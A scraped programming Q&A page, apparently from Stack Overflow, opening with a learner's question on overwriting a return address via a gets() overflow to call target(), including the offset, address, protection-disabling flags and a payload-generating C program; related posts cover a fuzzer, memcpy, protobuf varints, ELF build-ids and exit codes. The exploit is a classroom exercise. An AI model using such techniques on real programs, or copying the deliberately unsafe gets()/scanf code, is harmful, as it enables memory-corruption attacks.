Writing a buffer overflow exploit - security

I understand there are quite a few tutorials on how to write a buffer overflow, but still can't write my own.
The following is the C code I want to hack:
#include <stdio.h>
#include <stdlib.h>

static int x = 8;

void prompt(){
    char buf[100];
    gets(buf);
    printf("You entered: %s\n", buf);
}

int main(){
    prompt();
    return 0;
}

void target(){
    printf("Haha! I made it!\n");
    exit(0);
}
My goal is to execute the target() function via a buffer overflow exploit.
Through trial and error, I've discovered that the minimum number of characters required to obtain a segmentation fault is 108 (therefore 107 characters does NOT cause a seg fault).
I've disassembled the binary and found the target() function to be at address 0x08048e7f
I've flipped the byte order to compensate for endianness. --> 0x7f8e0408
I then converted that hexadecimal to binary, then to ASCII. The resulting bytes (0x7f 0x8e 0x04 0x08) are mostly unprintable; the one that does display shows up here as Ž (the original post rendered it as an HTML entity).
Afterwards, I inserted the first 107 characters, and then those address bytes.
Thus, my attack string is: iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiŽ
This still gives me a segmentation fault.
I've compiled like so:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program
and have disabled protections beforehand like so:
sudo sysctl -w kernel.randomize_va_space=0
I am using a 32-bit Ubuntu virtual machine.
Any ideas?
Thank you.
EDIT:
I just realized that my output on this site is being rendered as weird characters.
The weird Ž above really is the six characters & # 3 8 1 ; in that exact order (i.e. the HTML entity &#381;), which is how the site displayed the raw address byte.
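As a side note, a payload like this is easier to get right when the raw bytes are generated programmatically instead of being copy-pasted as unprintable characters. A minimal sketch in C, under the question's own assumptions (107 filler bytes, target() at 0x08048e7f written little-endian; the file name payload.bin is made up):

#include <stdio.h>

int main(void)
{
    /* Assumptions from the question: 107 filler bytes, then the address
       of target() (0x08048e7f) in little-endian byte order. */
    FILE *f = fopen("payload.bin", "wb");
    if (!f)
        return 1;
    for (int i = 0; i < 107; i++)
        fputc('i', f);
    unsigned char addr[4] = { 0x7f, 0x8e, 0x04, 0x08 };
    fwrite(addr, 1, sizeof addr, f);
    fputc('\n', f);   /* gets() reads up to the newline */
    fclose(f);
    return 0;
}

The payload can then be fed in with ./vuln_program < payload.bin. Whether 107 is really the distance to the saved return address is a separate question; the sketch only removes the copy-paste/encoding problem.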

Related

How to use memcpy in function that is passed a char pointer?

I'm quite new to pointers in C.
Here is a snippet of code I'm working on. I am probably not passing the pointer correctly but I can't figure out what's wrong.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

__uint16_t CCrc8();
__uint16_t process_command();

int main () {
    //command format: $SET,<0-1023>*<checksum,hex>\r\n
    char test_payload[] = "SET,1023*6e";
    process_command(test_payload);
    return 0;
}

__uint16_t process_command(char *str1) {
    char local_str[20];
    memcpy(local_str, str1, sizeof(str1));
    printf(str1);
    printf("\n");
    printf(local_str);
}
This results in:
SET,1023*6e
SET,1023
I'm expecting both lines to be the same. Anything past 8 characters is left off.
The only thing I can determine is that the problem is something with sizeof(str1). Any help appreciated.
Update: I've learned that sizeof(char *) is 2 on 16-bit systems, 4 on 32-bit systems, and 8 on 64-bit systems.
So how can I use memcpy to get a local copy of str1 when I'm unsure of the size it will be?
sizeof is an operator evaluated by the compiler. What you need is strlen from #include <string.h>.
The value of sizeof is determined at compile time. For example, sizeof(char[10]) just means 10. strlen, on the other hand, is a libc function that determines the string length at run time.
sizeof on a pointer tells you the size of the pointer itself, not of what it points to. Since you're on a 64-bit system, pointers are 8 bytes long, so your memcpy always copies exactly 8 bytes. Since your string is null-terminated, you should use stpncpy instead, like this:
if (stpncpy(local_str, str1, 20) == local_str + 20) {
    // too long - handle it somehow
}
That will copy the string until it reaches the NUL terminator or runs out of space in the destination, and in the latter case you can handle it (note that stpncpy does not NUL-terminate local_str when it truncates, so the handler should add the terminator itself).
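For completeness, here is a minimal sketch of process_command rewritten around strlen, as the first answer suggests (the length check, the void return type, and the error message are my assumptions, not part of the original code):

#include <stdio.h>
#include <string.h>

/* Copies str1 into a bounded local buffer using its run-time length. */
void process_command(const char *str1)
{
    char local_str[20];
    size_t len = strlen(str1);            /* run-time length, not sizeof */

    if (len >= sizeof local_str) {        /* leave room for the terminator */
        fprintf(stderr, "command too long\n");
        return;
    }
    memcpy(local_str, str1, len + 1);     /* +1 also copies the NUL */

    printf("%s\n", str1);
    printf("%s\n", local_str);
}

int main(void)
{
    process_command("SET,1023*6e");
    return 0;
}

Using "%s" instead of passing the buffer directly as the format string also avoids an unrelated format-string bug in the original printf(str1).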

Python3 fuzzer get return code name

I've written a fuzzer that causes a buffer overflow in a vulnerable C application by running it as a subprocess.
CASE #2 (Size = 24):
IN: AjsdfFjSueFmVnJiSkOpOjHk
OUT: -11
IN denotes the value passed to scanf.
OUT denotes the return code of the child process.
the vulnerable program:
#include <stdio.h>
#include <stdlib.h>

#define N 16 /* buffer size */

int main(void) {
    char name[N]; /* buffer */

    /* prompt user for name */
    printf("What's your name? ");
    scanf("%s", name);

    printf("Hi there, %s!\n", name); /* greet the user */
    return EXIT_SUCCESS;
}
Running this vulnerable program manually with the payload generated above, it crashes with:
Segmentation Fault
Now, to print the cause of the error properly, I'd like to map the integer return value to a named error, e.g. Segmentation Fault = -11.
However, during my research I could not find any information on how these error codes are actually mapped, not even for my example of -11 = Segmentation Fault.
I found the solution:
Popen.returncode
The child return code, set by poll() and wait() (and indirectly by communicate()). A None value indicates that the process hasn’t
terminated yet.
A negative value -N indicates that the child was terminated by signal N (Unix only).
-> Unix Signals
Hope this helps someone else too.
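As a footnote for readers coming from C: the number-to-name mapping is just the standard Unix signal table, so -11 corresponds to signal 11, SIGSEGV. A minimal C sketch that prints that table for reference (strsignal is POSIX; NSIG is a common glibc constant, so this is a glibc/Linux assumption and not part of the fuzzer itself):

#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* Print signal numbers and their descriptions,
       e.g. 11 -> "Segmentation fault". A Popen return code of -N
       corresponds to entry N in this table. */
    for (int sig = 1; sig < NSIG; sig++)
        printf("%2d: %s\n", sig, strsignal(sig));
    return 0;
}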

linux rpc: Varint for protobuf encoding : not expected value

I'm using google protocol buffer library with:
$protoc --version
libprotoc 2.5.0
I searched the internet and found that the varint encoding of an integer consists of multiple bytes, where the first (most significant) bit of each byte indicates whether the encoding continues into another byte. My understanding:
For the number 101 (0x65), it fits in one byte, so its encoded value is still 0x65.
For the number 0x6565, since it takes 2 bytes and Intel uses little endian, the first byte should have its top bit set to 1, i.e. 0x65 + 0x80 = 0xe5, so the whole integer should still be 2 bytes and be encoded as
0xe5 0x65
This is my expectation, but I tested it with sample programs. First I set the value 0x65 and serialized it to log7.data, then set 0x6565 and serialized it to log8.data, and used the xxd command to check them:
cat 7.proto
message hello
{
    required int32 f1=1;
}
$cat 7.cpp
#include "7.pb.h"
#include <fstream>
using namespace std;

int main()
{
    fstream f("./log7.data", ios::binary | ios::out);
    hello p;
    p.set_f1(0x65);
    p.SerializeToOstream(&f);
    return 0;
}
$cat 8.cpp
#include "8.pb.h"
#include <fstream>
using namespace std;

int main()
{
    fstream f("./log8.data", ios::binary | ios::out);
    hello p;
    p.set_f1(0x6565);
    p.SerializeToOstream(&f);
    return 0;
}
Check the output:
$protoc 7.proto --cpp_out=./
g++ 7.cpp 7.pb.cc -lprotobuf && ./a.out && xxd log7.data
00000000: 0865 .e
$protoc 8.proto --cpp_out=./
$g++ 8.cpp 8.pb.cc -lprotobuf && ./a.out && xxd log8.data
00000000: 08e5 ca01 ....
You can see that for log8.data I expected "08e5 65", but it's actually "08e5 ca01". How can this value be explained?
Thanks.
You need to split the value into 7-bit groups and set the continuation bit on every byte except the last:
0x6565 => to binary
0b110010101100101 => split into 7-bit groups
0b1 1001010 1100101 => prepend a 1 bit to every group except the highest one
0b1 11001010 11100101 => now show in hex
0x01cae5
The groups are emitted least-significant first, so the byte stream in the file is e5 ca 01, which is exactly what follows the 08 field tag in your xxd output.
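A minimal C sketch of this base-128 varint encoding (encode_varint is an illustrative helper, not part of the protobuf API):

#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Encode value as a base-128 varint: 7 bits per byte, least-significant
   group first, top bit set on every byte except the last. Returns the
   number of bytes written to out. */
static size_t encode_varint(uint64_t value, unsigned char *out)
{
    size_t n = 0;
    do {
        unsigned char byte = value & 0x7f;
        value >>= 7;
        if (value != 0)
            byte |= 0x80;   /* more bytes follow */
        out[n++] = byte;
    } while (value != 0);
    return n;
}

int main(void)
{
    unsigned char buf[10];
    size_t n = encode_varint(0x6565, buf);
    for (size_t i = 0; i < n; i++)
        printf("%02x ", buf[i]);   /* prints: e5 ca 01 */
    printf("\n");
    return 0;
}

Running it prints e5 ca 01, matching the bytes after the 08 tag in log8.data.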

Can a program read its own ELF section?

I would like to use ld's --build-id option in order to add build information to my binary. However, I'm not sure how to make this information available inside the program. Assume I want to write a program that writes a backtrace every time an exception occurs, and a script that parses this information. The script reads the symbol table of the program and searches for the addresses printed in the backtrace (I'm forced to use such a script because the program is statically linked and backtrace_symbols is not working). In order for the script to work correctly I need to match build version of the program with the build version of the program which created the backtrace. How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
You need to read the ElfW(Ehdr) (at the beginning of the file) to find program headers in your binary (.e_phoff and .e_phnum will tell you where program headers are, and how many of them to read).
You then read program headers, until you find PT_NOTE segment of your program. That segment will tell you offset to the beginning of all the notes in your binary.
You then need to read the ElfW(Nhdr) and skip the rest of the note (total size of the note is sizeof(Nhdr) + .n_namesz + .n_descsz, properly aligned), until you find a note with .n_type == NT_GNU_BUILD_ID.
Once you find NT_GNU_BUILD_ID note, skip past its .n_namesz, and read the .n_descsz bytes to read the actual build-id.
You can verify that you are reading the right data by comparing what you read with the output of readelf -n a.out.
P.S.
If you are going to go through the trouble to decode build-id as above, and if your executable is not stripped, it may be better for you to just decode and print symbol names instead (i.e. to replicate what backtrace_symbols does) -- it's actually easier to do than decoding ELF notes, because the symbol table contains fixed-sized entries.
Basically, this is the code I've written based on the answer given to my question. In order to compile the code I had to make some changes, and I hope it will work on as many platforms as possible; however, it was tested on only one build machine. One of the assumptions I made is that the program is built on the machine that runs it, so there is no point in checking endianness compatibility between the program and the machine.
user#:~/$ uname -s -r -m -o
Linux 3.2.0-45-generic x86_64 GNU/Linux
user#:~/$ g++ test.cpp -o test
user#:~/$ readelf -n test | grep Build
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
user#:~/$ ./test
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#if __x86_64__
# define ElfW(type) Elf64_##type
#else
# define ElfW(type) Elf32_##type
#endif
/*
detecting build id of a program from its note section
http://stackoverflow.com/questions/17637745/can-a-program-read-its-own-elf-section
http://www.scs.stanford.edu/histar/src/pkg/uclibc/utils/readelf.c
http://www.sco.com/developers/gabi/2000-07-17/ch5.pheader.html#note_section
*/
int main (int argc, char* argv[])
{
    char *thefilename = argv[0];
    FILE *thefile;
    struct stat statbuf;
    ElfW(Ehdr) *ehdr = 0;
    ElfW(Phdr) *phdr = 0;
    ElfW(Nhdr) *nhdr = 0;

    if (!(thefile = fopen(thefilename, "r"))) {
        perror(thefilename);
        exit(EXIT_FAILURE);
    }
    if (fstat(fileno(thefile), &statbuf) < 0) {
        perror(thefilename);
        exit(EXIT_FAILURE);
    }

    ehdr = (ElfW(Ehdr) *)mmap(0, statbuf.st_size,
                              PROT_READ|PROT_WRITE, MAP_PRIVATE, fileno(thefile), 0);
    phdr = (ElfW(Phdr) *)(ehdr->e_phoff + (size_t)ehdr);
    while (phdr->p_type != PT_NOTE)
    {
        ++phdr;
    }
    nhdr = (ElfW(Nhdr) *)(phdr->p_offset + (size_t)ehdr);
    while (nhdr->n_type != NT_GNU_BUILD_ID)
    {
        nhdr = (ElfW(Nhdr) *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz + nhdr->n_descsz);
    }

    unsigned char *build_id = (unsigned char *)malloc(nhdr->n_descsz);
    memcpy(build_id, (void *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz), nhdr->n_descsz);

    printf(" Build ID: ");
    for (int i = 0; i < nhdr->n_descsz; ++i)
    {
        printf("%02x", build_id[i]);
    }
    free(build_id);
    printf("\n");

    return 0;
}
Yes, a program can read its own .note.gnu.build-id. The important piece is the dl_iterate_phdr function.
I've used this technique in Mesa (the OpenGL/Vulkan implementation) to read its own build-id for use with the on-disk shader cache.
I've extracted those bits into a separate project[1] for easy use by others.
[1] https://github.com/mattst88/build-id
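For reference, a minimal sketch of that approach: walking the already-mapped program headers with dl_iterate_phdr instead of re-opening the binary. It assumes glibc/Linux, 4-byte note alignment, and the convention that the main executable is reported with an empty dlpi_name; treat it as a sketch, not the project's actual code.

#define _GNU_SOURCE
#include <elf.h>
#include <link.h>
#include <stdio.h>
#include <string.h>

/* Callback for dl_iterate_phdr: scan the PT_NOTE segments of the main
   executable for the NT_GNU_BUILD_ID note and print it. */
static int find_build_id(struct dl_phdr_info *info, size_t size, void *data)
{
    (void)size;
    (void)data;

    /* The main executable is reported with an empty name; skip shared libraries. */
    if (info->dlpi_name[0] != '\0')
        return 0;

    for (int i = 0; i < info->dlpi_phnum; i++) {
        const ElfW(Phdr) *phdr = &info->dlpi_phdr[i];
        if (phdr->p_type != PT_NOTE)
            continue;

        const char *p   = (const char *)(info->dlpi_addr + phdr->p_vaddr);
        const char *end = p + phdr->p_memsz;
        while (p + sizeof(ElfW(Nhdr)) <= end) {
            const ElfW(Nhdr) *nhdr = (const ElfW(Nhdr) *)p;
            const char *name = p + sizeof(ElfW(Nhdr));
            const unsigned char *desc =
                (const unsigned char *)(name + ((nhdr->n_namesz + 3) & ~3u));

            if (nhdr->n_type == NT_GNU_BUILD_ID &&
                nhdr->n_namesz == 4 && memcmp(name, "GNU", 4) == 0) {
                printf("Build ID: ");
                for (unsigned j = 0; j < nhdr->n_descsz; j++)
                    printf("%02x", desc[j]);
                printf("\n");
                return 1;   /* non-zero stops the iteration */
            }
            p = (const char *)desc + ((nhdr->n_descsz + 3) & ~3u);
        }
    }
    return 0;
}

int main(void)
{
    dl_iterate_phdr(find_build_id, NULL);
    return 0;
}

Compared with the mmap version above, this reads the notes the dynamic loader has already mapped, so it also works when argv[0] does not point at the real binary.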

What is a good Linux exit error code strategy?

I have several independent executable Perl, PHP CLI scripts and C++ programs for which I need to develop an exit error code strategy. These programs are called by other programs using a wrapper class I created to use exec() in PHP. So, I will be able to get an error code back. Based on that error code, the calling script will need to do something.
I have done a little bit of research, and it seems like anything in the 1-254 (or maybe just 1-127) range could be fair game for user-defined error codes.
I was just wondering how other people have approached error handling in this situation.
The only convention is that you return 0 for success, and something other than zero for an error. Most well-known unix programs document the various return codes that they can return, and so should you. It doesn't make a lot of sense to try to make a common list for all possible error codes that any arbitrary program could return, or else you end up with tens of thousands of them like some other OS's, and even then, it doesn't always cover the specific type of error you want to return.
So just be consistent, and be sure to document whatever scheme you decide to use.
1-127 is the range conventionally available for your own codes. Anything over 127 is supposed to indicate an "abnormal" exit: the shell reports 128 + N when a process is terminated by signal N.
While you're at it, consider using stdout rather than the exit code. The exit code is by tradition used to indicate success, failure, and maybe one other state. Rather than using the exit code, try using stdout the way expr and wc use it. You can then use backticks or something similar in the caller to extract the result.
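A toy C sketch of that pattern (the add program and its interface are made up for illustration): the result goes to stdout, and the exit status only reports success or failure.

#include <stdio.h>

/* Toy example in the spirit of expr/wc: the computed result goes to
   stdout; the exit status only says whether the computation succeeded. */
int main(int argc, char **argv)
{
    long a, b;

    if (argc != 3 ||
        sscanf(argv[1], "%ld", &a) != 1 ||
        sscanf(argv[2], "%ld", &b) != 1) {
        fprintf(stderr, "usage: add NUM NUM\n");
        return 1;                  /* failure */
    }
    printf("%ld\n", a + b);        /* the caller captures this output */
    return 0;                      /* success */
}

The caller then does something like sum=$(./add 2 3) and only checks the exit status for success or failure.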
the unix manifesto states -
Exit as soon and as loud as possible on error
or something like that
Don't try to encode too much meaning into the exit value: detailed statuses and error reports should go to stdout / stderr as Arkadiy suggests.
However, I have found it very useful to represent just a handful of states in the exit values, using binary digits to encode them. For example, suppose you have the following contrived meanings:
0000 : 0 (no error)
0001 : 1 (error)
0010 : 2 (I/O error)
0100 : 4 (user input error)
1000 : 8 (permission error)
Then, a user input error would have a return value of 5 (4 + 1), while a log file not having write permission might have a return value of 11 (8 + 2 + 1). As the different meanings are independently encoded in the return value, you can easily see what's happened by checking which bits are set.
As a special case, to see if there was an error you can AND the return code with 1.
By doing this, you can encode a couple of different things in the return code, in a clear and simple way. I use this only to make simple decisions such as "should the process be restarted", "do the return value and relevant logs need to be sent to an admin", that sort of thing. Any detailed diagnostic information should go to logs or to stdout / stderr.
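A minimal C sketch of this bit-flag scheme (the ST_ names are made up for illustration):

/* Each condition gets its own bit so independent failures can be
   combined into a single exit code. */
enum {
    ST_OK    = 0,
    ST_ERROR = 1 << 0,  /* 1: generic error     */
    ST_IO    = 1 << 1,  /* 2: I/O error         */
    ST_INPUT = 1 << 2,  /* 4: user input error  */
    ST_PERM  = 1 << 3   /* 8: permission error  */
};

int main(void)
{
    int status = ST_OK;

    /* e.g. a log file that cannot be written because of permissions: */
    status |= ST_ERROR | ST_IO | ST_PERM;   /* 1 + 2 + 8 = 11 */

    return status;  /* the caller tests individual bits, e.g. (status & ST_ERROR) */
}

The parent process can then test individual bits of the exit status to decide, for example, whether to restart the process or alert an admin.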
The normal exit statuses run from 0 to 255 (see Exit codes bigger than 255 possible for a discussion of why). Normally, status 0 indicates success; anything else is an implementation-defined error. I do know of a program that reports the state of a DBMS server via the exit status; that is a special case of implementation-defined exit statuses. Note that you get to define the implementation of the statuses of your programs.
I couldn't fit this into 300 characters; otherwise it would have been a comment to #Arkadiy's answer.
Arkadiy is right that in one part of the exit status word, values other than zero indicate the signal that terminated the process and the 8th bit normally indicates a core dump, but that section of the exit status is different from the main 0..255 status. However, the shell (whichever shell it is) is presented with a problem when a process dies as a result of a signal. There are 16 bits of data to be presented in an 8-bit value, which is always tricky. What the shells seem to do is to take the signal number and add 128 to it. So, if a process dies as a result of an interrupt (signal number 2, SIGINT), the shell reports the exit status as 130. However, the kernel reported the status as 0x0002; the shell has modified what the kernel reports.
The following C code demonstrates this. There are two programs:
suicide which kills itself using a signal of your choosing (interrupt by default).
exitstatus which runs a command (such as suicide) and reports the kernel exit status.
Here's suicide.c:
/*
#(#)File: $RCSfile: suicide.c,v $
#(#)Version: $Revision: 1.2 $
#(#)Last changed: $Date: 2008/12/28 03:45:18 $
#(#)Purpose: Commit suicide using kill()
#(#)Author: J Leffler
#(#)Copyright: (C) JLSS 2008
#(#)Product: :PRODUCT:
*/
/*TABSTOP=4*/
#if __STDC_VERSION__ >= 199901L
#define _XOPEN_SOURCE 600
#else
#define _XOPEN_SOURCE 500
#endif /* __STDC_VERSION__ */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "stderr.h"
static const char usestr[] = "[-V][-s signal]";
#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
extern const char jlss_id_suicide_c[];
const char jlss_id_suicide_c[] = "#(#)$Id: suicide.c,v 1.2 2008/12/28 03:45:18 jleffler Exp $";
#endif /* lint */
int main(int argc, char **argv)
{
    int signum = SIGINT;
    int opt;
    char *end;

    err_setarg0(argv[0]);
    while ((opt = getopt(argc, argv, "Vs:")) != -1)
    {
        switch (opt)
        {
        case 's':
            signum = strtol(optarg, &end, 0);
            if (*end != '\0' || signum <= 0)
                err_error("invalid signal number %s\n", optarg);
            break;
        case 'V':
            err_version("SUICIDE", &"#(#)$Revision: 1.2 $ ($Date: 2008/12/28 03:45:18 $)"[4]);
            break;
        default:
            err_usage(usestr);
            break;
        }
    }
    if (optind != argc)
        err_usage(usestr);
    kill(getpid(), signum);
    return(0);
}
And here's exitstatus.c:
/*
#(#)File: $RCSfile: exitstatus.c,v $
#(#)Version: $Revision: 1.2 $
#(#)Last changed: $Date: 2008/12/28 03:45:18 $
#(#)Purpose: Run command and report 16-bit exit status
#(#)Author: J Leffler
#(#)Copyright: (C) JLSS 2008
#(#)Product: :PRODUCT:
*/
/*TABSTOP=4*/
#if __STDC_VERSION__ >= 199901L
#define _XOPEN_SOURCE 600
#else
#define _XOPEN_SOURCE 500
#endif /* __STDC_VERSION__ */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include "stderr.h"
#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
extern const char jlss_id_exitstatus_c[];
const char jlss_id_exitstatus_c[] = "#(#)$Id: exitstatus.c,v 1.2 2008/12/28 03:45:18 jleffler Exp $";
#endif /* lint */
int main(int argc, char **argv)
{
    pid_t pid;

    err_setarg0(argv[0]);
    if (argc < 2)
        err_usage("cmd [args...]");

    if ((pid = fork()) < 0)
        err_syserr("fork() failed: ");
    else if (pid == 0)
    {
        /* Child */
        execvp(argv[1], &argv[1]);
        return(1);
    }
    else
    {
        pid_t corpse;
        int status;
        corpse = waitpid(pid, &status, 0);
        if (corpse != pid)
            err_syserr("waitpid() failed: ");
        printf("0x%04X\n", status);
    }
    return(0);
}
The missing code, stderr.c and stderr.h, can easily be found in essentially any of my published programs. If you need it urgently, get it from the program SQLCMD at the IIUG Software Archive; alternatively, contact me by email (see my profile).
